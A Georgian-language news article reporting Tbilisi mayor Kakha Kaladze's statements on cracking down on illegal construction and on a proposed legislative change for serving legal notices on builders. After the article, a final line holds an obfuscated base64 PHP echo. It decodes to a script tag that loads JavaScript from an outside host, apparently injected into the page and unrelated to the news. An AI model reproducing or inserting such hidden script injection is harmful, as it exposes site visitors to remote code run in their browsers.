celsiusi
ავერსი საქკაბელი
თბილისის მერის კახა კალაძის განცხადებით, დედაქალაქის მერიას უკანონო მშენებლობების საკითხზე ყოველთვის მკაცრი რეაგირება ექნება.
 
როგორც მან თბილისის მთავრობის სხდომაზე აღნიშნა, დედაქალაქში ეს პრობლემა ერთხელ და სამუდამოდ უნდა აღმოიფხვრას.
 
„ჩვენი მხრიდან არც ერთი უკანონო მშენებლობა რეაგირების გარეშე არ დაგვიტოვებია, ყველაზე რეაგირება მოხდა და შესაბამისი კანონმდებლობით რაც არის დასაშვები, ყველაფერი გაკეთდა. ახლა გვაქვს ერთი პრობლემა, რასაც ბოლო თვეების განმავლობაში ვაწყდებით. მშენებლები, რომლებიც უკანონო მშენებლობას ეწევიან, ერთგვარ ხრიკს იყენებენ და გვინდა, ეს ყველაფერი მოვაგვაროთ. კერძოდ, სამშენებლო კომპანიები, რომლებიც მშენებლობას უკანონოდ ახორციელებენ, მერიის იურიდიული სამსახურის გადაწყვეტილებას არ იბარებენ, ხოლო გადაწყვეტილების ჩაუბარებლობის გამო, ვეღარ იქმნება საფუძველი გადაწყვეტილების აღსრულებისთვის, ან არ ხდება ვადების ათვლა. თუ არ იბარებს კომპანია ჩვენ მიერ გამოწერილ ჯარიმას, ვადების ათვლაც ვერ ხდება და ეს სერიოზულ პრობლემას წარმოადგენს. შესაბამისად, საკანონმდებლო ცვლილებითა და ინიციატივით გვინდა მივმართოთ საქართველოს პარლამენტს. დარწმუნებული ვარ, ძალიან დიდი მხარდაჭერა იქნება. გვინდა, იურიდიული სამსახურის გადაწყვეტილების შემთხვევაში, გამოვიყენოთ ის მოდელი, რომელიც მუნიციპალური ინსპექციის მიერ გამოიყენება გამოცემულ სამართლებრივ აქტებთან დაკავშირებით. კერძოდ, იურიდიული სამსახურის მიერ გამოცემული აქტის განთავსება მოხდეს ობიექტზე და ის ჩაიბაროს, გამოქვეყნებულად და ჩაბარებულად. ეს კი იმას ნიშნავს, რომ მშენებლის მიერ სამართლებრივი აქტის ჩაუბარებლობა აღსრულების პროცესს ვეღარ შეაფერხებს. ამ ყველაფრის გაკეთება ძალიან მნიშვნელოვანია, რომ ერთხელ და სამუდამოდ ჩვენ ამაზე საუბარი დავასრულოთ. უკანონო მშენებლობები სისხლის სამართლის დანაშაულია. ძალიან მკაცრი რეაგირება ექნება ამას ყოველთვის, ძალიან პრინციპულები ვიქნებით იმისთვის, რომ ამ ქალაქში ერთხელ და სამუდამოდ ეს პრობლემა აღმოიფხვრას“, - განაცხადა კალაძემ.
 
რაც შეეხება უკანონო მშენებლობებთან დაკავშირებით, პოლიტიკური ოპონენტების კრიტიკას, კახა კალაძის თქმით, ამ საკითხზე მათი მხრიდან არასწორი ინფორმაციები ვრცელდება.
 
„ვერ დაასახელებენ ვერც ერთ ფაქტს, რომ მუნიციპალურ ინსპექციას უკანონო მშენებლობებზე რეაგირება არ ჰქონდა და კანონით გათვალისწინებულ ფარგლებში არ ემოქმედა“, - განაცხადა კალაძემ.
868
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");